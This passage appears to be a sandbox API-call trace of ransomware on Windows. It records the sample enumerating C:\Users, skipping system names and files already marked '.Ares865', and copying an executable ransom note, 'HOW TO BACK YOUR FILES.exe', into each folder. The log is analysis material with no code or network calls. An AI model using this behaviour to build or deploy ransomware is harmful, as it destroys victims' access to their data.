lpString2="temp") returned 1 [0039.575] lstrcmpiW (lpString1="Users", lpString2="pagefile.sys") returned 1 [0039.575] lstrcmpiW (lpString1="Users", lpString2="boot") returned 1 [0039.575] lstrcmpiW (lpString1="Users", lpString2="ids.txt") returned 1 [0039.575] lstrcmpiW (lpString1="Users", lpString2="ntuser.dat") returned 1 [0039.575] lstrcmpiW (lpString1="Users", lpString2="perflogs") returned 1 [0039.575] lstrcmpiW (lpString1="Users", lpString2="MSBuild") returned 1 [0039.575] lstrlenW (lpString="Users") returned 5 [0039.575] lstrlenW (lpString="C:\\System Volume Information") returned 28 [0039.575] lstrcpyW (in: lpString1=0x2e2e866, lpString2="Users" | out: lpString1="Users") returned="Users" [0039.575] SetFileAttributesW (lpFileName="C:\\Users", dwFileAttributes=0x10) returned 1 [0039.576] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0039.576] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2e7b48 [0039.576] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7b30 | out: ListHead=0x2e77d0, ListEntry=0x2e7b30) returned 0x2e7b10 [0039.576] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0039.576] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.576] lstrcmpiW (lpString1="Windows", lpString2="aoldtz.exe") returned 1 [0039.576] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0039.576] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0039.576] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0039.576] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0039.576] FindClose (in: hFindFile=0x2ca380 | out: hFindFile=0x2ca380) returned 1 [0039.576] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e7b30 [0039.576] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users", iMaxLength=260 | out: lpString1="C:\\Users") returned="C:\\Users" [0039.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0039.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0039.576] lstrlenW (lpString="C:\\Users") returned 8 [0039.576] lstrcatW (in: lpString1="", lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0039.576] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.576] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\how to back your files.exe"), bFailIfExists=1) returned 0 [0039.577] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0039.577] GetLastError () returned 0x0 [0039.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0039.577] ReadFile (in: hFile=0xec, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0039.577] CloseHandle (hObject=0xec) returned 1 [0039.577] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0039.577] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.577] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49354420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49354420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ca380 [0039.577] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.577] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.577] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.577] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49354420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49354420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.577] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.577] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.577] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.577] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.577] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0039.577] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.577] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="aoldtz.exe") returned -1 [0039.577] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0039.578] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0039.578] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="windows") returned -1 [0039.578] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="bootmgr") returned -1 [0039.578] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="temp") returned -1 [0039.578] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="pagefile.sys") returned -1 [0039.578] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="boot") returned -1 [0039.578] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="ids.txt") returned -1 [0039.578] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="ntuser.dat") returned -1 [0039.578] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="perflogs") returned -1 [0039.578] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="MSBuild") returned -1 [0039.578] lstrlenW (lpString="5p5NrGJn0jS HALPmcxz") returned 20 [0039.578] lstrlenW (lpString="C:\\Users\\*") returned 10 [0039.578] lstrcpyW (in: lpString1=0x2e2e872, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0039.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0039.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3c) returned 0x2e6090 [0039.578] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7b30 | out: ListHead=0x2e77d0, ListEntry=0x2e7b30) returned 0x2e7b10 [0039.578] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2="aoldtz.exe") returned -1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2=".") returned 1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2="..") returned 1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2="windows") returned -1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2="bootmgr") returned -1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2="temp") returned -1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2="pagefile.sys") returned -1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2="boot") returned -1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2="ids.txt") returned -1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2="ntuser.dat") returned -1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2="perflogs") returned -1 [0039.578] lstrcmpiW (lpString1="All Users", lpString2="MSBuild") returned -1 [0039.578] lstrlenW (lpString="All Users") returned 9 [0039.578] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 29 [0039.578] lstrcpyW (in: lpString1=0x2e2e872, lpString2="All Users" | out: lpString1="All Users") returned="All Users" [0039.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0039.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x26) returned 0x2ef8f0 [0039.579] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7b50 | out: ListHead=0x2e77d0, ListEntry=0x2e7b50) returned 0x2e7b30 [0039.579] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0039.579] lstrcmpiW (lpString1="Default", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.579] lstrcmpiW (lpString1="Default", lpString2="aoldtz.exe") returned 1 [0039.579] lstrcmpiW (lpString1="Default", lpString2=".") returned 1 [0039.579] lstrcmpiW (lpString1="Default", lpString2="..") returned 1 [0039.579] lstrcmpiW (lpString1="Default", lpString2="windows") returned -1 [0039.579] lstrcmpiW (lpString1="Default", lpString2="bootmgr") returned 1 [0039.579] lstrcmpiW (lpString1="Default", lpString2="temp") returned -1 [0039.579] lstrcmpiW (lpString1="Default", lpString2="pagefile.sys") returned -1 [0039.579] lstrcmpiW (lpString1="Default", lpString2="boot") returned 1 [0039.579] lstrcmpiW (lpString1="Default", lpString2="ids.txt") returned -1 [0039.579] lstrcmpiW (lpString1="Default", lpString2="ntuser.dat") returned -1 [0039.579] lstrcmpiW (lpString1="Default", lpString2="perflogs") returned -1 [0039.579] lstrcmpiW (lpString1="Default", lpString2="MSBuild") returned -1 [0039.579] lstrlenW (lpString="Default") returned 7 [0039.579] lstrlenW (lpString="C:\\Users\\All Users") returned 18 [0039.579] lstrcpyW (in: lpString1=0x2e2e872, lpString2="Default" | out: lpString1="Default") returned="Default" [0039.579] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0039.579] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2ef920 [0039.579] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7b70 | out: ListHead=0x2e77d0, ListEntry=0x2e7b70) returned 0x2e7b50 [0039.579] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2="aoldtz.exe") returned 1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2=".") returned 1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2="..") returned 1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2="windows") returned -1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2="bootmgr") returned 1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2="temp") returned -1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2="pagefile.sys") returned -1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2="boot") returned 1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2="ids.txt") returned -1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2="ntuser.dat") returned -1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2="perflogs") returned -1 [0039.579] lstrcmpiW (lpString1="Default User", lpString2="MSBuild") returned -1 [0039.580] lstrlenW (lpString="Default User") returned 12 [0039.580] lstrlenW (lpString="C:\\Users\\Default") returned 16 [0039.580] lstrcpyW (in: lpString1=0x2e2e872, lpString2="Default User" | out: lpString1="Default User") returned="Default User" [0039.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0039.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2c) returned 0x2ed020 [0039.580] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7b90 | out: ListHead=0x2e77d0, ListEntry=0x2e7b90) returned 0x2e7b70 [0039.580] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0039.580] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0039.580] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0039.580] lstrlenW (lpString="C:\\Users\\Default User") returned 21 [0039.580] lstrcpyW (in: lpString1=0x2e2e872, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0039.580] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0039.580] lstrlenW (lpString="Ares865") returned 7 [0039.580] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0039.580] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4932e2c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4932e2c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.580] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.580] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0039.580] lstrcmpiW (lpString1="Public", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.580] lstrcmpiW (lpString1="Public", lpString2="aoldtz.exe") returned 1 [0039.580] lstrcmpiW (lpString1="Public", lpString2=".") returned 1 [0039.580] lstrcmpiW (lpString1="Public", lpString2="..") returned 1 [0039.580] lstrcmpiW (lpString1="Public", lpString2="windows") returned -1 [0039.580] lstrcmpiW (lpString1="Public", lpString2="bootmgr") returned 1 [0039.580] lstrcmpiW (lpString1="Public", lpString2="temp") returned -1 [0039.580] lstrcmpiW (lpString1="Public", lpString2="pagefile.sys") returned 1 [0039.581] lstrcmpiW (lpString1="Public", lpString2="boot") returned 1 [0039.581] lstrcmpiW (lpString1="Public", lpString2="ids.txt") returned 1 [0039.581] lstrcmpiW (lpString1="Public", lpString2="ntuser.dat") returned 1 [0039.581] lstrcmpiW (lpString1="Public", lpString2="perflogs") returned 1 [0039.581] lstrcmpiW (lpString1="Public", lpString2="MSBuild") returned 1 [0039.581] lstrlenW (lpString="Public") returned 6 [0039.581] lstrlenW (lpString="C:\\Users\\desktop.ini.Ares865") returned 28 [0039.581] lstrcpyW (in: lpString1=0x2e2e872, lpString2="Public" | out: lpString1="Public") returned="Public" [0039.581] SetFileAttributesW (lpFileName="C:\\Users\\Public", dwFileAttributes=0x10) returned 1 [0039.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0039.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2c9488 [0039.581] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7bb0 | out: ListHead=0x2e77d0, ListEntry=0x2e7bb0) returned 0x2e7b90 [0039.581] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0039.581] FindClose (in: hFindFile=0x2ca380 | out: hFindFile=0x2ca380) returned 1 [0039.581] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e7bb0 [0039.581] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public", iMaxLength=260 | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0039.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c9488 | out: hHeap=0x2b0000) returned 1 [0039.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0039.581] lstrlenW (lpString="C:\\Users\\Public") returned 15 [0039.581] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0039.581] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.581] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\how to back your files.exe"), bFailIfExists=1) returned 1 [0039.586] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.586] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49484f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49484f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ca380 [0039.586] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.586] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.586] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.586] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49484f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49484f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.586] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.586] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.586] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.586] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.586] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2="aoldtz.exe") returned 1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2="bootmgr") returned 1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2="temp") returned -1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2="pagefile.sys") returned -1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2="boot") returned 1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2="ids.txt") returned -1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2="ntuser.dat") returned -1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2="perflogs") returned -1 [0039.586] lstrcmpiW (lpString1="Desktop", lpString2="MSBuild") returned -1 [0039.586] lstrlenW (lpString="Desktop") returned 7 [0039.586] lstrlenW (lpString="C:\\Users\\Public\\*") returned 17 [0039.586] lstrcpyW (in: lpString1=0x2e2e880, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0039.586] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop", dwFileAttributes=0x12) returned 1 [0039.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0039.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x30) returned 0x2ed0c8 [0039.637] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7cb0 | out: ListHead=0x2e77d0, ListEntry=0x2e7cb0) returned 0x2e7b90 [0039.637] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.637] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.637] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0039.637] lstrcmpiW (lpString1="desktop.ini", 